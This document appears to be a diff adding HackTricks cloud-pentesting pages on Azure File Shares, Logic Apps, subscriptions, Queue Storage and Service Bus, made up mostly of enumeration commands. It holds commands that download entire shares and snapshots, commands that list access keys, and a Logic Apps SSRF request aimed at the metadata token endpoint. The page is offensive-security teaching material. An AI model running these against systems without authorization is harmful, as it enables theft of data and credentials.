+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-file-shares.md b/pentesting-cloud/azure-security/az-services/az-file-shares.md
new file mode 100644
index 0000000000..400d3a0e46
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-services/az-file-shares.md
@@ -0,0 +1,170 @@
+# Az - File Shares
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+**Azure Files** is a fully managed cloud file storage service that provides shared file storage accessible via standard **SMB (Server Message Block)** and **NFS (Network File System)** protocols. Although the main protocol used is SMB as NFS Azure file shares aren't supported for Windows (according to the [**docs**](https://learn.microsoft.com/en-us/azure/storage/files/files-nfs-protocol)). It allows you to create highly available network file shares that can be accessed simultaneously by multiple virtual machines (VMs) or on-premises systems, enabling seamless file sharing across environments.
+
+### Access Tiers
+
+* **Transaction Optimized**: Optimized for transaction-heavy operations.
+* **Hot**: Balanced between transactions and storage.
+* **Cool**: Cost-effective for storage.
+* **Premium:** High-performance file storage optimized for low-latency and IOPS-intensive workloads.
+
+### Backups
+
+* **Daily backup**: A backup point is created each day at an indicated time (e.g. 19.30 UTC) and stored for from 1 to 200 days.
+* **Weekly backup**: A backup point is created each week at an indicated day and time (Sunday at 19.30) and stored for from 1 to 200 weeks.
+* **Monthly backup**: A backup point is created each month at an indicated day and time (e.g. first Sunday at 19.30) and stored for from 1 to 120 months.
+* **Yearly backup**: A backup point is created each year at an indicated day and time (e.g. January first Sunday at 19.30) and stored for from 1 to 10 years.
+* It's also possible to perform **manual backups and snapshots at any time**. Backups and snapshots are actually the same in this context.
+
+### Supported Authentications via SMB
+
+* **On-premises AD DS Authentication**: It uses on-premises Active Directory credentials synced with Microsoft Entra ID for identity-based access. It requires network connectivity to on-premises AD DS.
+* **Microsoft Entra Domain Services Authentication**: It leverages Microsoft Entra Domain Services (cloud-based AD) to provide access using Microsoft Entra credentials.
+* **Microsoft Entra Kerberos for Hybrid Identities**: It enables Microsoft Entra users to authenticate Azure file shares over the internet using Kerberos. It supports hybrid Microsoft Entra joined or Microsoft Entra joined VMs without requiring connectivity to on-premises domain controllers. But it does not support cloud-only identities.
+* **AD Kerberos Authentication for Linux Clients**: It allows Linux clients to use Kerberos for SMB authentication via on-premises AD DS or Microsoft Entra Domain Services.
+
+## Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# Get storage accounts
+az storage account list #Get the account name from here
+
+# List file shares
+az storage share list --account-name <name>
+# Get dirs/files inside the share
+az storage file list --account-name <name> --share-name <share-name>
+## If type is "dir", you can continue enumerating files inside of it
+az storage file list --account-name <name> --share-name <prev_dir/share-name>
+# Download a complete share (with directories and files inside of them)
+az storage file download-batch -d . --source <share-name> --account-name <name>
+
+# Get snapshots/backups
+az storage share list --account-name <name> --include-snapshots --query "[?snapshot != null]"
+# List contents of a snapshot/backup
+az storage file list --account-name <name> --share-name <share-name> --snapshot <snapshot-version> #e.g. "2024-11-25T11:26:59.0000000Z"
+# Download snapshot/backup
+az storage file download-batch -d . --account-name <name> --source <share-name> --snapshot <snapshot-version>
+```
+{% endcode %}
+
+{% hint style="info" %}
+By default `az` cli will use an account key to sign a key and perform the action. To use the Entra ID principal privileges use the parameters `--auth-mode login --enable-file-backup-request-intent`.
+{% endhint %}
+
+{% hint style="success" %}
+Use the param `--account-key` to indicate the account key to use\
+Use the param `--sas-token` with the SAS token to access via a SAS token
+{% endhint %}
+
+### Connection
+
+These are the scripts proposed by Azure at the time of the writing to connect a File Share:
+
+You need to replace the `<STORAGE-ACCOUNT>`, `<ACCESS-KEY>` and `<FILE-SHARE-NAME>` placeholders.
+
+{% tabs %}
+{% tab title="Windows" %}
+{% code overflow="wrap" %}
+```powershell
+$connectTestResult = Test-NetConnection -ComputerName filescontainersrdtfgvhb.file.core.windows.net -Port 445
+if ($connectTestResult.TcpTestSucceeded) {
+    # Save the password so the drive will persist on reboot
+    cmd.exe /C "cmdkey /add:`"<STORAGE-ACCOUNT>.file.core.windows.net`" /user:`"localhost\<STORAGE-ACCOUNT>`" /pass:`"<ACCESS-KEY>`""
+    # Mount the drive
+    New-PSDrive -Name Z -PSProvider FileSystem -Root "\\<STORAGE-ACCOUNT>.file.core.windows.net\<FILE-SHARE-NAME>" -Persist
+} else {
+    Write-Error -Message "Unable to reach the Azure storage account via port 445. Check to make sure your organization or ISP is not blocking port 445, or use Azure P2S VPN, Azure S2S VPN, or Express Route to tunnel SMB traffic over a different port."
+}
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="Linux" %}
+{% code overflow="wrap" %}
+```bash
+sudo mkdir /mnt/disk-shareeifrube
+if [ ! -d "/etc/smbcredentials" ]; then
+sudo mkdir /etc/smbcredentials
+fi
+if [ ! -f "/etc/smbcredentials/<STORAGE-ACCOUNT>.cred" ]; then
+    sudo bash -c 'echo "username=<STORAGE-ACCOUNT>" >> /etc/smbcredentials/<STORAGE-ACCOUNT>.cred'
+    sudo bash -c 'echo "password=<ACCESS-KEY>" >> /etc/smbcredentials/<STORAGE-ACCOUNT>.cred'
+fi
+sudo chmod 600 /etc/smbcredentials/<STORAGE-ACCOUNT>.cred
+
+sudo bash -c 'echo "//<STORAGE-ACCOUNT>.file.core.windows.net/<FILE-SHARE-NAME> /mnt/<FILE-SHARE-NAME> cifs nofail,credentials=/etc/smbcredentials/<STORAGE-ACCOUNT>.cred,dir_mode=0777,file_mode=0777,serverino,nosharesock,actimeo=30" >> /etc/fstab'
+sudo mount -t cifs //<STORAGE-ACCOUNT>.file.core.windows.net/<FILE-SHARE-NAME> /mnt/<FILE-SHARE-NAME> -o credentials=/etc/smbcredentials/<STORAGE-ACCOUNT>.cred,dir_mode=0777,file_mode=0777,serverino,nosharesock,actimeo=30
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="macOS" %}
+{% code overflow="wrap" %}
+```bash
+open smb://<STORAGE-ACCOUNT>:<ACCESS-KEY>@<STORAGE-ACCOUNT>.file.core.windows.net/<FILE-SHARE-NAME>
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+### Regular storage enumeration (access keys, SAS...)
+
+{% content-ref url="az-storage.md" %}
+[az-storage.md](az-storage.md)
+{% endcontent-ref %}
+
+## Privilege Escalation
+
+Same as storage privesc:
+
+{% content-ref url="../az-privilege-escalation/az-storage-privesc.md" %}
+[az-storage-privesc.md](../az-privilege-escalation/az-storage-privesc.md)
+{% endcontent-ref %}
+
+## Post Exploitation
+
+{% content-ref url="../az-post-exploitation/az-file-share-post-exploitation.md" %}
+[az-file-share-post-exploitation.md](../az-post-exploitation/az-file-share-post-exploitation.md)
+{% endcontent-ref %}
+
+## Persistence
+
+Same as storage persistence:
+
+{% content-ref url="../az-persistence/az-storage-persistence.md" %}
+[az-storage-persistence.md](../az-persistence/az-storage-persistence.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-logic-apps.md b/pentesting-cloud/azure-security/az-services/az-logic-apps.md
new file mode 100644
index 0000000000..051da854b7
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-services/az-logic-apps.md
@@ -0,0 +1,97 @@
+# Az - Logic Apps
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Azure Logic Apps is a cloud-based service provided by Microsoft Azure that enables developers to **create and run workflows that integrate various services**, data sources, and applications. These workflows are designed to **automate business processes**, orchestrate tasks, and perform data integrations across different platforms.
+
+Logic Apps provides a visual designer to create workflows with a **wide range of pre-built connectors**, which makes it easy to connect to and interact with various services, such as Office 365, Dynamics CRM, Salesforce, and many others. You can also create custom connectors for your specific needs.
+
+### Examples
+
+* **Automating Data Pipelines**: Logic Apps can automate **data transfer and transformation processes** in combination with Azure Data Factory. This is useful for creating scalable and reliable data pipelines that move and transform data between various data stores, like Azure SQL Database and Azure Blob Storage, aiding in analytics and business intelligence operations.
+* **Integrating with Azure Functions**: Logic Apps can work alongside Azure Functions to develop **sophisticated, event-driven applications that scale as needed** and integrate seamlessly with other Azure services. An example use case is using a Logic App to trigger an Azure Function in response to certain events, such as changes in an Azure Storage account, allowing for dynamic data processing.
+
+### Visualize a LogicAPP
+
+It's possible to view a LogicApp with graphics:
+
+<figure><img src="../../../.gitbook/assets/image (197).png" alt=""><figcaption></figcaption></figure>
+
+or to check the code in the "**Logic app code view**" section.
+
+### SSRF Protection
+
+Even if you find the **Logic App vulnerable to SSRF**, you won't be able to access the credentials from the metadata as Logic Apps doesn't allow that.
+
+For example, something like this won't return the token:
+
+{% code overflow="wrap" %}
+```bash
+# The URL belongs to a Logic App vulenrable to SSRF
+curl -XPOST 'https://prod-44.westus.logic.azure.com:443/workflows/2d8de4be6e974123adf0b98159966644/triggers/manual/paths/invoke?api-version=2016-10-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=_8_oqqsCXc0u2c7hNjtSZmT0uM4Xi3hktw6Uze0O34s' -d '{"url": "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"}' -H "Content-type: application/json" -v
+```
+{% endcode %}
+
+### Enumeration
+
+{% tabs %}
+{% tab title="az cli" %}
+{% code overflow="wrap" %}
+```bash
+# List
+az logic workflow list --resource-group <ResourceGroupName> --subscription <SubscriptionID> --output table
+# Get info
+az logic workflow show --name <LogicAppName> --resource-group <ResourceGroupName> --subscription <SubscriptionID>
+# Get Logic App config
+az logic workflow definition show --name <LogicAppName> --resource-group <ResourceGroupName> --subscription <SubscriptionID>
+# Get service ppal used
+az logic workflow identity show --name <LogicAppName> --resource-group <ResourceGroupName> --subscription <SubscriptionID>
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="Az PowerSHell" %}
+{% code overflow="wrap" %}
+```powershell
+# List
+Get-AzLogicApp -ResourceGroupName <ResourceGroupName>
+# Get info
+Get-AzLogicApp -ResourceGroupName <ResourceGroupName> -Name <LogicAppName>
+# Get Logic App config
+(Get-AzLogicApp -ResourceGroupName <ResourceGroupName> -Name <LogicAppName>).Definition | ConvertTo-Json
+# Get service ppal used
+(Get-AzLogicApp -ResourceGroupName <ResourceGroupName> -Name <LogicAppName>).Identity
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md b/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md
new file mode 100644
index 0000000000..b2479b6bc9
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md
@@ -0,0 +1,86 @@
+# Az - Management Groups, Subscriptions & Resource Groups
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Management Groups
+
+You can find more info about Management Groups in:
+
+{% content-ref url="../az-basic-information/" %}
+[az-basic-information](../az-basic-information/)
+{% endcontent-ref %}
+
+### Enumeration
+
+```bash
+# List
+az account management-group list
+# Get details and management groups and subscriptions that are children
+az account management-group show --name <name> --expand --recurse
+```
+
+## Subscriptions
+
+You can find more info about Subscriptions in:
+
+{% content-ref url="../az-basic-information/" %}
+[az-basic-information](../az-basic-information/)
+{% endcontent-ref %}
+
+### Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# List all subscriptions
+az account list --output table
+# Get details
+az account management-group subscription show --name <management group> --subscription <subscription>
+```
+{% endcode %}
+
+## Resource Groups
+
+You can find more info about Resource Groups in:
+
+{% content-ref url="../az-basic-information/" %}
+[az-basic-information](../az-basic-information/)
+{% endcontent-ref %}
+
+### Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# List all resource groups
+az group list
+# Get resource groups of specific subscription
+az group list --subscription "<subscription>" --output table
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-queue-enum.md b/pentesting-cloud/azure-security/az-services/az-queue-enum.md
new file mode 100644
index 0000000000..03b3918bcf
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-services/az-queue-enum.md
@@ -0,0 +1,117 @@
+# Az - Queue Storage
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Azure Queue Storage is a service in Microsoft's Azure cloud platform designed for message queuing between application components, **enabling asynchronous communication and decoupling**. It allows you to store an unlimited number of messages, each up to 64 KB in size, and supports operations such as creating and deleting queues, adding, retrieving, updating, and deleting messages, as well as managing metadata and access policies. While it typically processes messages in a first-in-first-out (FIFO) manner, strict FIFO is not guaranteed.
+
+### Enumeration
+
+{% tabs %}
+{% tab title="Az Cli" %}
+```bash
+# You need to know the --account-name of the storage (az storage account list)
+az storage queue list --account-name <storage_account>
+
+# Queue Metadata
+az storage queue metadata show --name <queue_name> --account-name <storage_account>
+
+#Get ACL 
+az storage queue policy list --queue-name <queue_name> --account-name <storage_account>
+
+# Get Messages (getting a message deletes it)
+az storage message get --queue-name <queue_name> --account-name <storage_account>
+
+# Peek Messages
+az storage message peek --queue-name <queue_name> --account-name <storage_account>
+```
+{% endtab %}
+
+{% tab title="Az PS" %}
+```bash
+# Get the Storage Context
+$storageAccount = Get-AzStorageAccount -ResourceGroupName QueueResourceGroup -Name queuestorageaccount1994
+$ctx = $storageAccount.Context
+
+# Set Variables for Storage Account
+$storageAccountName = "queuestorageaccount"
+
+# List Queues
+Get-AzStorageQueue -Context $context
+$queueName = "myqueue"
+
+# Retrieve a specific queue
+$queue = Get-AzStorageQueue -Name $queueName -Context $context
+$queue # Show the properties of the queue
+
+# Retrieve the access policies for the queue
+$accessPolicies = Get-AzStorageQueueStoredAccessPolicy -Context $context -QueueName $queueName
+$accessPolicies
+
+# Peek Messages
+$queueMessage = $queue.QueueClient.PeekMessage()
+$queueMessage.Value
+
+# Set the amount of time you want to entry to be invisible after read from the queue
+# If it is not deleted by the end of this time, it will show up in the queue again
+$visibilityTimeout = [System.TimeSpan]::FromSeconds(10)
+
+# Read the messages from the queue, then show the contents of the messages.
+$queueMessage = $queue.QueueClient.ReceiveMessages(1,$visibilityTimeout)
+$queueMessage.Value
+```
+{% endtab %}
+{% endtabs %}
+
+### Privilege Escalation
+
+{% content-ref url="../az-privilege-escalation/az-queue-privesc.md" %}
+[az-queue-privesc.md](../az-privilege-escalation/az-queue-privesc.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../az-post-exploitation/az-queue-post-exploitation.md" %}
+[az-queue-post-exploitation.md](../az-post-exploitation/az-queue-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../az-persistence/az-queue-persistance.md" %}
+[az-queue-persistance.md](../az-persistence/az-queue-persistance.md)
+{% endcontent-ref %}
+
+## References
+
+* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
+* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
+* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md b/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md
new file mode 100644
index 0000000000..f65b1df8c2
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md
@@ -0,0 +1,123 @@
+# Az - Service Bus Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Service Bus
+
+Azure Service Bus is a cloud-based **messaging service** designed to enable reliable **communication between different parts of an application or separate applications**. It acts as a secure middleman, ensuring messages are safely delivered, even if the sender and receiver aren’t operating simultaneously. By decoupling systems, it allows applications to work independently while still exchanging data or instructions. It’s particularly useful for scenarios requiring load balancing across multiple workers, reliable message delivery, or complex coordination, such as processing tasks in order or securely managing access. 
+
+### Key Concepts
+
+1. **Queues:** its purpose is to store messages until the receiver is ready.
+    - Messages are ordered, timestamped, and durably stored.
+    - Delivered in pull mode (on-demand retrieval).
+    - Supports point-to-point communication.
+2. **Topics:** Publish-subscribe messaging for broadcasting.
+    - Multiple independent subscriptions receive copies of messages.
+    - Subscriptions can have rules/filters to control delivery or add metadata.
+    - Supports many-to-many communication.
+3. **Namespaces:** A container for all messaging components, queues and topics, is like your own slice of a powerful Azure cluster, providing dedicated capacity and optionally spanning across three availability zones.
+
+### Advance Features
+Some advance features are:
+
+- **Message Sessions**: Ensures FIFO processing and supports request-response patterns.
+- **Auto-Forwarding**: Transfers messages between queues or topics in the same namespace.
+- **Dead-Lettering**: Captures undeliverable messages for review.
+- **Scheduled Delivery**: Delays message processing for future tasks.
+- **Message Deferral**: Postpones message retrieval until ready.
+- **Transactions**: Groups operations into atomic execution.
+- **Filters & Actions**: Applies rules to filter or annotate messages.
+- **Auto-Delete on Idle**: Deletes queues after inactivity (min: 5 minutes).
+- **Duplicate Detection**: Removes duplicate messages during resends.
+- **Batch Deletion**: Bulk deletes expired or unnecessary messages.
+
+### Authorization-Rule / SAS Policy
+
+SAS Policies define the access permissions for Azure Service Bus entities namespace (Most Important One), queues and topics. Each policy has the following components:
+
+ - **Permissions**: Checkboxes to specify access levels:
+    - Manage: Grants full control over the entity, including configuration and permissions management.
+    - Send: Allows sending messages to the entity.
+    - Listen: Allows receiving messages from the entity.
+ - **Primary and Secondary Keys**: These are cryptographic keys used to generate secure tokens for authenticating access.
+ - **Primary and Secondary Connection Strings**: Pre-configured connection strings that include the endpoint and key for easy use in applications.
+ - **SAS Policy ARM ID**: The Azure Resource Manager (ARM) path to the policy for programmatic identification.
+
+### NameSpace
+
+sku, authrorization rule, 
+
+### Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# Queue Enumeration
+az servicebus queue list --resource-group <MyResourceGroup> --namespace-name <MyNamespace>
+az servicebus queue show --resource-group <MyResourceGroup> --namespace-name <MyNamespace> --name <MyQueue>
+
+# Topic Enumeration
+az servicebus topic list --resource-group <MyResourceGroup> --namespace-name <MyNamespace>
+az servicebus topic show --resource-group <MyResourceGroup> --namespace-name <MyNamespace> --name <MyTopic>
+
+# Susbscription Enumeration
+az servicebus topic subscription list --resource-group <MyResourceGroup> --namespace-name <MyNamespace> --topic-name <MyTopic>
+az servicebus topic subscription show --resource-group <MyResourceGroup> --namespace-name <MyNamespace> --topic-name <MyTopic> --name <MySubscription>
+
+# Namespace Enumeration
+az servicebus namespace list
+az servicebus namespace network-rule-set list --resource-group <MyResourceGroup> --namespace-name <MyNamespace>
+az servicebus namespace show --resource-group <MyResourceGroup> --name <MyNamespace>
+az servicebus namespace network-rule-set show --resource-group <MyResourceGroup> --namespace-name <MyNamespace>
+az servicebus namespace private-endpoint-connection list --resource-group <MyResourceGroup> --namespace-name <MyNamespace>
+az servicebus namespace exists --name ProposedNamespace
+
+# Authorization Rule Enumeration
+az servicebus namespace authorization-rule list --resource-group <MyResourceGroup> --namespace-name <MyNamespace>
+az servicebus queue authorization-rule list --resource-group <MyResourceGroup> --namespace-name <MyNamespace> --queue-name <MyQueue>
+az servicebus topic authorization-rule list --resource-group <MyResourceGroup> --namespace-name <MyNamespace> --topic-name <MyTopic>
+az servicebus namespace authorization-rule keys list --resource-group <MyResourceGroup> --namespace-name <MyNamespace> --name <MyAuthRule>
+```
+{% endcode %}
+
+### Privilege Escalation
+
+{% content-ref url="../az-services/az-servicebus-privesc.md" %}
+[az-servicebus-privesc.md](../az-services/az-servicebus-privesc.md)
